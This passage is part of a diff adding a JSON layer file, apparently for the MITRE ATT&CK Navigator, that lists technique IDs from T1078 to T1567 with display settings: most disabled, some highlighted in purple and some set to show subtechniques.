+            "enabled": false,
+            "techniqueID": "T1078.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1078.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1078.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1079"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1080"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1081"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1082"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1083"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1084"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1085"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1086"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1087"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1087"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1087.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1087.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1087.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1087.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1087.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1088"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1089"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1090"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1090.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1090.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1090.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1090.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1091"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1092"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1093"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1094"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1095"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1096"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1097"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1098"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1098.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1098.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1098.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1098.004"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1098.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1098.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1099"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1100"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1101"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1102"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1102.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1102.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1102.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1103"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1104"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1105"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1106"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1107"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1108"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1109"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1110"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1110.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1110.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1110.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1110.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1111"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1112"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1113"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1114"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1114.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1114.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1114.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1115"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1116"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1117"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1118"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1119"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1120"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1121"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1122"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1123"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1124"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1125"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1126"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1127"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1127.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1128"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1129"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1130"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1131"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1132"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1132.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1132.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1133"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1134"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1134.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1134.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1134.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1134.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1134.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1135"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1136"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1136.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1136.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1136.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1138"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1139"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1140"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1141"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1142"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1143"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1144"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1145"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1146"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1147"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1148"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1149"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1150"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1151"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1152"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1153"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1154"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1155"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1156"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1157"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1158"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1159"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1160"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1161"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1162"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1163"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1164"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1165"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1166"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1167"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1168"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1169"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1170"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1171"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1172"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1173"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1174"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1175"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1176"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1177"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1178"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1179"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1180"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1181"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1182"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1183"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1184"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1185"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1186"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1187"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1188"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1189"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1190"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1191"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1192"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1193"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1194"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1195"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1195.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1195.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1195.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1196"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1197"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1198"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1199"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1200"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1201"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1202"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1203"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1204"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1204.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1204.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1204.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1205"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1205.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1205.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1206"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1207"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1208"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1209"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1210"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1211"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1212"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1213"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1213.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1213.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1213.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1214"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1215"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1216"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1216.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1217"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1218"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.010"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1218.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.013"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.014"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1219"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1220"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1221"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1222"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1222.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1222.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1223"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1480"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1480.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1482"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1483"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1484"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1484"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1484"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1484.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1484.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1485"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1486"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1487"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1488"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1489"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1490"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1491"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1491.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1491.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1492"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1493"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1494"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1495"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1496"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1497"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1497.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1497.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1497.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1498"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1498.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1498.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1499"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1499.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1499.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1499.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1499.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1500"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1501"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1502"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1503"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1504"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1505"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1505.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1505.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1505.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1505.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1505.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1506"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1514"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1518"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1518.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1519"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1522"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1525"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1526"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1527"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1528"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1529"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1530"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1531"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1534"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1535"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1536"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1537"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1538"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1539"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1542"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1542.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1542.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1542.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1542.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1542.005"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1543"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1543.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1543.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1543.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1543.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.013"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.014"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.015"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.016"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1547"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1547"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1547"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1547.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.003"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1547.004"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1547.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.013"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.014"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.015"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1548"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1548.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1548.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1548.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1548.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1548.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1550"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1550.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1550.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1550.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1550.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1554"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1555"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1555.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1555.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1555.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1555.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1555.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1555.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1557"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1557.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1557.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1557.003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1558"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1558.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1558.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1558.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1558.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1559"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1559.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1559.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1559.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1560"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1560.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1560.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1560.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1561"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1561.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1561.002"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1562"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1562.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1563"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1563.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1563.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1565"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1565.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1565.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1565.003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1566"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1566"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1566"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1566.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1566.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1566.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1566.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1566.004"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1567"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1567.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1567.002"
+        },
+        {
+            "enabled": false,
